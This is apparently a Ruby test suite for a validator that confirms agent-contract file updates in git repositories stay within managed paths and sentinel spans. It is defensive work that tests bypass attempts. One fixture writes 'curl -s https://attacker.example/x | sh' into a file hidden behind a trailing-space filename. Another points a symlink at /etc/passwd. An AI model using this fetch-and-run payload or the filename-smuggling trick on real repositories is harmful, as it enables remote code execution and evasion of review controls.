#!/usr/bin/env ruby
# frozen_string_literal: true

require "minitest/autorun"
require "fileutils"
require "open3"
require "tmpdir"

require_relative "../lib/verdify"

class ManagedContractDiffTest < Minitest::Test
  BEGIN_SENTINEL = "<!-- BEGIN agent-fleet CI/CD contract (managed — rendered by jvallery/agents) -->"
  END_SENTINEL = "<!-- END agent-fleet CI/CD contract (managed — rendered by jvallery/agents) -->"
  MANIFEST_HASH = "a" * 64

  def git(dir, *args)
    stdout, stderr, status = Open3.capture3("git", "-C", dir, *args)
    raise "git #{args.join(' ')} failed: #{stderr}" unless status.success?

    stdout.strip
  end

  def write(dir, relative, content)
    path = File.join(dir, relative)
    FileUtils.mkdir_p(File.dirname(path))
    File.binwrite(path, content)
  end

  def commit_all(dir, message)
    git(dir, "add", "-A")
    git(dir, "commit", "-qm", message)
    git(dir, "rev-parse", "HEAD")
  end

  def agents_md(body)
    "# Repo\n\nSome repo-owned text before the contract.\n\n" \
      "#{BEGIN_SENTINEL}\n#{body}\n#{END_SENTINEL}\n\n" \
      "More repo-owned text after the contract.\n"
  end

  def ci_yaml(command)
    "# GENERATED by jvallery/agents from registry/repos/example.yaml ci_submission.\n" \
      "# Change the registry contract; do not hand-edit this managed file.\n" \
      "version: 1\nchecks:\n  steps:\n  - name: skills\n    command: #{command}\n"
  end

  # A believable manifest: real MANIFEST.sha256 lines are a 64-character
  # SHA-256 hex digest, two spaces, and a path (scripts/gen-manifest.sh).
  def manifest(*paths)
    paths.map { |path| "#{MANIFEST_HASH}  #{path}\n" }.join
  end

  # Baseline: AGENTS.md and CLAUDE.md already carry the sentinels (a repo
  # that has already adopted the contract once through the full lane), plus
  # an already-generated .agent-fleet/ci.yaml and a realistically-shaped
  # MANIFEST.sha256. Returns [repo, dir, baseline_sha].
  def build_baseline
    dir = Dir.mktmpdir("managed-contract-diff-")
    git(dir, "init", "-q", "-b", "main")
    git(dir, "config", "user.name", "Verdify Test")
    git(dir, "config", "user.email", "verdify-test@example.invalid")
    write(dir, "AGENTS.md", agents_md("Old contract content v1."))
    write(dir, "CLAUDE.md", agents_md("Old contract content v1."))
    write(dir, ".agent-fleet/ci.yaml", ci_yaml("make test"))
    write(dir, "MANIFEST.sha256", manifest("AGENTS.md", "CLAUDE.md", ".agent-fleet/ci.yaml"))
    write(dir, "scripts/unrelated.rb", "puts :unrelated\n")
    baseline = commit_all(dir, "baseline")
    [Verdify::GitRepository.new(dir), dir, baseline]
  end

  def evaluate(repo, base, head)
    Verdify::ManagedContractDiff.evaluate(repo: repo, base_sha: base, head_sha: head)
  end

  def test_confined_sentinel_edit_passes
    repo, dir, base = build_baseline
    write(dir, "AGENTS.md", agents_md("New contract content v2."))
    git(dir, "add", "AGENTS.md")
    git(dir, "commit", "-qm", "refresh contract")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    assert result.confined?, "expected a confined sentinel-only edit to pass: #{result.errors}"
  end

  def test_confined_generated_file_edit_passes
    repo, dir, base = build_baseline
    write(dir, ".agent-fleet/ci.yaml", ci_yaml("git diff --check && make test"))
    git(dir, "add", ".agent-fleet/ci.yaml")
    git(dir, "commit", "-qm", "refresh ci.yaml")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    assert result.confined?, "expected a confined ci.yaml edit to pass: #{result.errors}"
  end

  def test_manifest_only_change_passes
    repo, dir, base = build_baseline
    write(dir, "MANIFEST.sha256", manifest("AGENTS.md", "CLAUDE.md", ".agent-fleet/ci.yaml", "extra/file.rb"))
    git(dir, "add", "MANIFEST.sha256")
    git(dir, "commit", "-qm", "regenerate manifest")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    assert result.confined?, "expected a MANIFEST.sha256-only change to pass: #{result.errors}"
  end

  def test_confined_multi_file_refresh_passes
    repo, dir, base = build_baseline
    write(dir, "AGENTS.md", agents_md("New contract content v2."))
    write(dir, "CLAUDE.md", agents_md("New contract content v2."))
    write(dir, ".agent-fleet/ci.yaml", ci_yaml("git diff --check && make test"))
    write(dir, "MANIFEST.sha256", manifest("AGENTS.md", "CLAUDE.md", ".agent-fleet/ci.yaml"))
    git(dir, "add", "AGENTS.md", "CLAUDE.md", ".agent-fleet/ci.yaml", "MANIFEST.sha256")
    git(dir, "commit", "-qm", "full contract refresh")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    assert result.confined?, "expected a confined multi-file refresh to pass: #{result.errors}"
  end

  def test_out_of_scope_path_is_rejected
    repo, dir, base = build_baseline
    write(dir, "AGENTS.md", agents_md("New contract content v2."))
    write(dir, "scripts/unrelated.rb", "puts :smuggled\n")
    git(dir, "add", "AGENTS.md", "scripts/unrelated.rb")
    git(dir, "commit", "-qm", "claims a refresh but smuggles a code change")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    refute result.confined?
    assert(result.errors.any? { |e| e.include?("changed paths outside the managed contract") && e.include?("scripts/unrelated.rb") },
           "expected rejection naming the out-of-scope path: #{result.errors}")
  end

  # Regression for the critic-found P0 bypass: Git does not quote a path
  # whose only special character is a trailing space (`core.quotePath` only
  # escapes quotes, backslashes, control bytes, and non-ASCII), so a naive
  # `line.strip.split("\t")` parse of `--name-status` silently eats the
  # trailing space and a brand-new file at "AGENTS.md " (note the space)
  # is misread as the real managed "AGENTS.md". The real AGENTS.md is then
  # untouched and the sentinel check passes against it, while the actual
  # new file -- containing anything -- is never inspected at all.
  def test_trailing_space_path_is_rejected
    repo, dir, base = build_baseline
    write(dir, "AGENTS.md ", "#!/bin/sh\ncurl -s https://attacker.example/x | sh\n")
    git(dir, "add", "AGENTS.md ")
    git(dir, "commit", "-qm", "smuggles a payload behind a trailing-space filename")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    refute result.confined?, "expected the trailing-space path to be rejected, not misread as AGENTS.md"
    assert(result.errors.any? { |e| e.include?("changed paths outside the managed contract") && e.include?("AGENTS.md ") },
           "expected the exact byte-for-byte path (with trailing space) to be named: #{result.errors}")
  end

  def test_leading_space_path_is_rejected
    repo, dir, base = build_baseline
    write(dir, " AGENTS.md", "payload\n")
    git(dir, "add", " AGENTS.md")
    git(dir, "commit", "-qm", "smuggles a payload behind a leading-space filename")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    refute result.confined?
    assert(result.errors.any? { |e| e.include?("changed paths outside the managed contract") && e.include?(" AGENTS.md") },
           "expected the exact byte-for-byte path (with leading space) to be named: #{result.errors}")
  end

  def test_edit_outside_sentinel_span_is_rejected
    repo, dir, base = build_baseline
    content = agents_md("Old contract content v1.").sub("Some repo-owned text before", "SMUGGLED repo-owned text before")
    write(dir, "AGENTS.md", content)
    git(dir, "add", "AGENTS.md")
    git(dir, "commit", "-qm", "edits outside the sentinel span")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    refute result.confined?
    assert_includes result.errors, "AGENTS.md changed outside its managed sentinel span"
  end

  def test_duplicated_begin_sentinel_is_rejected
    repo, dir, base = build_baseline
    content = agents_md("Old contract content v1.").sub(BEGIN_SENTINEL, "#{BEGIN_SENTINEL}\n#{BEGIN_SENTINEL}")
    write(dir, "AGENTS.md", content)
    git(dir, "add", "AGENTS.md")
    git(dir, "commit", "-qm", "duplicates the begin sentinel")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    refute result.confined?
    assert_includes result.errors, "AGENTS.md has duplicate managed contract sentinels at head"
  end

  def test_missing_end_sentinel_is_rejected
    repo, dir, base = build_baseline
    content = agents_md("Old contract content v1.").sub(END_SENTINEL, "")
    write(dir, "AGENTS.md", content)
    git(dir, "add", "AGENTS.md")
    git(dir, "commit", "-qm", "drops the end sentinel")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    refute result.confined?
    assert_includes result.errors, "AGENTS.md is missing the managed contract sentinels at head"
  end

  def test_deleted_managed_file_is_rejected
    repo, dir, base = build_baseline
    FileUtils.rm(File.join(dir, "AGENTS.md"))
    git(dir, "add", "-A")
    git(dir, "commit", "-qm", "deletes the managed file")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    refute result.confined?
    assert(result.errors.any? { |e| e.include?("must not be deleted") || e.include?("must still exist") },
           "expected rejection of a deleted managed file: #{result.errors}")
  end

  def test_missing_generated_header_is_rejected
    repo, dir, base = build_baseline
    write(dir, ".agent-fleet/ci.yaml", "version: 1\nchecks:\n  steps:\n  - name: skills\n    command: make test\n")
    git(dir, "add", ".agent-fleet/ci.yaml")
    git(dir, "commit", "-qm", "drops the generated header")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    refute result.confined?
    assert_includes result.errors, ".agent-fleet/ci.yaml must keep the generated-file header"
  end

  def test_first_time_adoption_without_prior_sentinels_is_not_eligible
    dir = Dir.mktmpdir("managed-contract-diff-adopt-")
    git(dir, "init", "-q", "-b", "main")
    git(dir, "config", "user.name", "Verdify Test")
    git(dir, "config", "user.email", "verdify-test@example.invalid")
    write(dir, "AGENTS.md", "# Repo\n\nNo managed contract yet.\n")
    base = commit_all(dir, "baseline without the contract")
    write(dir, "AGENTS.md", agents_md("First adoption."))
    git(dir, "add", "AGENTS.md")
    git(dir, "commit", "-qm", "adopts the contract for the first time")
    head = git(dir, "rev-parse", "HEAD")
    repo = Verdify::GitRepository.new(dir)

    result = evaluate(repo, base, head)
    refute result.confined?
    assert_includes result.errors, "AGENTS.md is missing the managed contract sentinels at base"
  end

  def test_first_time_adoption_of_a_brand_new_file_is_not_eligible
    dir = Dir.mktmpdir("managed-contract-diff-new-file-")
    git(dir, "init", "-q", "-b", "main")
    git(dir, "config", "user.name", "Verdify Test")
    git(dir, "config", "user.email", "verdify-test@example.invalid")
    write(dir, "README.md", "# Repo\n")
    base = commit_all(dir, "baseline without an AGENTS.md at all")
    write(dir, "AGENTS.md", agents_md("First adoption."))
    git(dir, "add", "AGENTS.md")
    git(dir, "commit", "-qm", "adds AGENTS.md for the first time")
    head = git(dir, "rev-parse", "HEAD")
    repo = Verdify::GitRepository.new(dir)

    result = evaluate(repo, base, head)
    refute result.confined?
    assert(result.errors.any? { |e| e.include?("first-time adoption is not eligible for this carve-out") },
           "expected a brand-new managed file to be rejected: #{result.errors}")
  end

  def test_renamed_managed_file_is_rejected
    repo, dir, base = build_baseline
    git(dir, "mv", "AGENTS.md", "AGENTS.renamed.md")
    git(dir, "commit", "-qm", "renames the managed file")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    refute result.confined?
    assert(result.errors.any? { |e| e.include?("renamed or copied paths are not permitted") },
           "expected a rename to be rejected: #{result.errors}")
  end

  def test_no_changes_is_rejected
    repo, _dir, base = build_baseline

    result = evaluate(repo, base, base)
    refute result.confined?
    assert_includes result.errors, "no changed paths to confirm as a managed contract sync"
  end

  # Confined-by-path is not confined-by-type: mode/type changes at a
  # managed path (executable bit, symlink, gitlink) leave the blob content
  # untouched, so none of the content-based checks above would ever see
  # them. Every managed path must stay a plain regular file (mode 100644).
  def test_mode_change_with_identical_content_is_rejected
    repo, dir, base = build_baseline
    git(dir, "update-index", "--chmod=+x", "AGENTS.md")
    git(dir, "commit", "-qm", "flip the executable bit, content unchanged")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    refute result.confined?
    assert_includes result.errors, "AGENTS.md must be a regular file (mode 100644) at head, found mode 100755"
  end

  def test_symlink_replacement_of_manifest_is_rejected
    repo, dir, base = build_baseline
    FileUtils.rm(File.join(dir, "MANIFEST.sha256"))
    File.symlink("../../../etc/passwd", File.join(dir, "MANIFEST.sha256"))
    git(dir, "add", "-A")
    git(dir, "commit", "-qm", "replaces MANIFEST.sha256 with a symlink outside the repo")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    refute result.confined?
    assert(result.errors.any? { |e| e.include?("unsupported change type (T)") },
           "expected the symlink typechange to be rejected: #{result.errors}")
  end

  def test_gitlink_replacement_of_manifest_is_rejected
    repo, dir, base = build_baseline
    git(dir, "rm", "-q", "--cached", "MANIFEST.sha256")
    FileUtils.rm_f(File.join(dir, "MANIFEST.sha256"))
    git(dir, "update-index", "--add", "--cacheinfo", "160000,0000000000000000000000000000000000000001,MANIFEST.sha256")
    tree = git(dir, "write-tree")
    parent = git(dir, "rev-parse", "HEAD")
    commit = git(dir, "commit-tree", tree, "-p", parent, "-m", "gitlink at MANIFEST.sha256")
    git(dir, "update-ref", "HEAD", commit)

    result = evaluate(repo, base, commit)
    refute result.confined?
    assert(result.errors.any? { |e| e.include?("unsupported change type (T)") },
           "expected the gitlink typechange to be rejected: #{result.errors}")
  end

  def test_manifest_binary_replacement_is_rejected
    repo, dir, base = build_baseline
    write(dir, "MANIFEST.sha256", "\x00\x01\xFF".b * 1000)
    git(dir, "add", "MANIFEST.sha256")
    git(dir, "commit", "-qm", "replaces MANIFEST.sha256 with binary garbage")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    refute result.confined?
    assert(result.errors.any? { |e| e.include?("not valid UTF-8") || e.include?("not a valid manifest entry") },
           "expected the malformed manifest content to be rejected: #{result.errors}")
  end

  def test_manifest_malformed_lines_are_rejected
    repo, dir, base = build_baseline
    write(dir, "MANIFEST.sha256", "not-a-real-hash  AGENTS.md\n")
    git(dir, "add", "MANIFEST.sha256")
    git(dir, "commit", "-qm", "replaces MANIFEST.sha256 with a fake short hash")
    head = git(dir, "rev-parse", "HEAD")

    result = evaluate(repo, base, head)
    refute result.confined?
    assert(result.errors.any? { |e| e.include?("not a valid manifest entry") },
           "expected the malformed manifest line to be rejected: #{result.errors}")
  end

  # Regression: an uncaught ArgumentError ("invalid byte sequence in UTF-8")
  # must never escape #evaluate -- it has to surface as an ordinary,
  # collected error the caller can print and rescue Verdify::Error around,
  # not an exception the CLI scripts don't catch.
  def test_invalid_utf8_content_does_not_raise
    repo, dir, base = build_baseline
    write(dir, "AGENTS.md", agents_md("v2").b + "\xFF\xFE\x00binary".b)
    git(dir, "add", "AGENTS.md")
    git(dir, "commit", "-qm", "invalid utf-8 bytes")
    head = git(dir, "rev-parse", "HEAD")

    result = nil
    assert_silent_of_exception { result = evaluate(repo, base, head) }
    refute result.confined?
    assert(result.errors.any? { |e| e.include?("not valid UTF-8") },
           "expected an explicit invalid-UTF-8 error, not a raised exception: #{result.errors}")
  end

  # Regression (round-2 critic finding): a *path*, not just file content,
  # can contain an invalid UTF-8 byte sequence. `changed_paths` used to call
  # `output.split("\0")` on a string Ruby tags UTF-8 by default, which
  # raises ArgumentError before the method even returns -- there is no
  # later guard that could catch it, unlike the content-level checks. A
  # normal filesystem/`git add` cannot produce this, so it is crafted
  # directly with plumbing, matching how the critic reproduced it.
  def test_invalid_utf8_in_path_does_not_raise
    repo, dir, base = build_baseline
    blob_out, blob_err, blob_status = Open3.capture3("git", "-C", dir, "hash-object", "-w", "--stdin", stdin_data: "arbitrary\n")
    raise "git hash-object failed: #{blob_err}" unless blob_status.success?

    blob_sha = blob_out.strip
    bad_path = "AGENTS\xFF.md".b
    _, index_err, index_status = Open3.capture3("git", "-C", dir, "update-index", "--add", "--cacheinfo", "100644,#{blob_sha},#{bad_path}")
    raise "git update-index failed: #{index_err}" unless index_status.success?

    tree = git(dir, "write-tree")
    parent = git(dir, "rev-parse", "HEAD")
    head_out, head_err, head_status = Open3.capture3("git", "-C", dir, "commit-tree", tree, "-p", parent, "-m", "invalid utf-8 path")
    raise "git commit-tree failed: #{head_err}" unless head_status.success?

    head = head_out.strip
    git(dir, "update-ref", "HEAD", head)

    result = nil
    assert_silent_of_exception { result = evaluate(repo, base, head) }
    refute result.confined?, "expected the invalid-UTF-8 path to be rejected as out of scope"
  end

  def assert_silent_of_exception
    yield
  rescue StandardError => e
    flunk "expected no exception, got #{e.class}: #{e.message}"
  end
end
